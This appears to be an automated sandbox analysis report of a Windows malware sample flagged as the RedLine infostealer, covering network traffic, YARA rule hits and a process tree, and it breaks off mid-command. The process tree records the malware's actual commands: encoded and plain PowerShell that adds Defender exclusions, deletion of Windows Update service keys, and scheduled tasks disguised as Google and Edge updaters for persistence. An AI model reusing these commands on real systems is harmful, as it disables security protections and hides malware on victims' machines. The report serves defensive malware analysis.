Source: unknown	TCP traffic detected without corresponding DNS query: 37.220.87.2
Source: unknown	TCP traffic detected without corresponding DNS query: 37.220.87.2
Source: unknown	TCP traffic detected without corresponding DNS query: 37.220.87.2

Source: unknown

HTTP traffic detected: POST /api/proxy/nodes/get HTTP/1.1Content-Type: application/jsonUser-Agent: Microsoft Internet ExplorerHost: api.peer2profit.comContent-Length: 186Cache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.3:49978 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.0.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.2.ofg.exe.f80000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.6iWK0k820U.exe.41b788.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.6iWK0k820U.exe.41b788.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.2.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.0.6iWK0k820U.exe.41b788.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.6iWK0k820U.exe.520000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.6iWK0k820U.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.6iWK0k820U.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 232

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_004055D0	0_2_004055D0
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00409488	0_2_00409488
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040995D	0_2_0040995D
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040A55D	0_2_0040A55D
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00412530	0_2_00412530
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00409D31	0_2_00409D31
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040A13D	0_2_0040A13D
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_004105E1	0_2_004105E1
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00414A6C	0_2_00414A6C
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00412A74	0_2_00412A74
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_004136B0	0_2_004136B0
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00420760	0_2_00420760
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00412FB8	0_2_00412FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_068708FB	2_2_068708FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0687F6D0	2_2_0687F6D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A6001770	14_2_00007FF6A6001770
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A6003170	14_2_00007FF6A6003170
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A6006EE0	14_2_00007FF6A6006EE0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A6022510	14_2_00007FF6A6022510
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A60029D0	14_2_00007FF6A60029D0

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: updater.exe.14.dr	Static PE information: Number of sections : 11 > 10
Source: brave.exe.2.dr	Static PE information: Number of sections : 11 > 10

Source: 6iWK0k820U.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 53.0.GoogleUpdate.exe.1b0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 50.0.GoogleUpdate.exe.1b0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 21.0.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 17.2.ofg.exe.f80000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.6iWK0k820U.exe.41b788.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 42.0.GoogleUpdate.exe.1b0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 0.0.6iWK0k820U.exe.41b788.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 21.2.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 17.0.ofg.exe.f80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.0.6iWK0k820U.exe.41b788.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.6iWK0k820U.exe.520000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.chrome.exe.13848d8.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 0.0.6iWK0k820U.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.6iWK0k820U.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object

Source: C:\Users\user\AppData\Local\Google\chrome.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF6A6031250 appears 107 times
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF6A6032490 appears 59 times
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: String function: 004079B0 appears 63 times

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF6A6004C80 NtClose,

14_2_00007FF6A6004C80

Source: 85AD.tmp.14.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: 6iWK0k820U.exe	Binary or memory string: OriginalFilename vs 6iWK0k820U.exe
Source: 6iWK0k820U.exe, 00000000.00000000.245807284.000000000043F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBeefB vs 6iWK0k820U.exe
Source: 6iWK0k820U.exe, 00000000.00000003.252199975.0000000000544000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEffulging.exe4 vs 6iWK0k820U.exe
Source: 6iWK0k820U.exe, 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEffulging.exe4 vs 6iWK0k820U.exe
Source: 6iWK0k820U.exe	Binary or memory string: OriginalFilenameBeefB vs 6iWK0k820U.exe

Source: 6iWK0k820U.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@88/23@8/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF6A600F6C0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

14_2_00007FF6A600F6C0

Source: C:\Users\user\AppData\Local\Google\brave.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: 6iWK0k820U.exe	Virustotal: Detection: 41%
Source: 6iWK0k820U.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6iWK0k820U.exe C:\Users\user\Desktop\6iWK0k820U.exe
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\ofg.exe C:\Users\user\AppData\Local\Google\ofg.exe
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\chrome.exe C:\Users\user\AppData\Local\Google\chrome.exe
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\chrome.exe C:\Users\user\AppData\Local\Google\chrome.exe
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 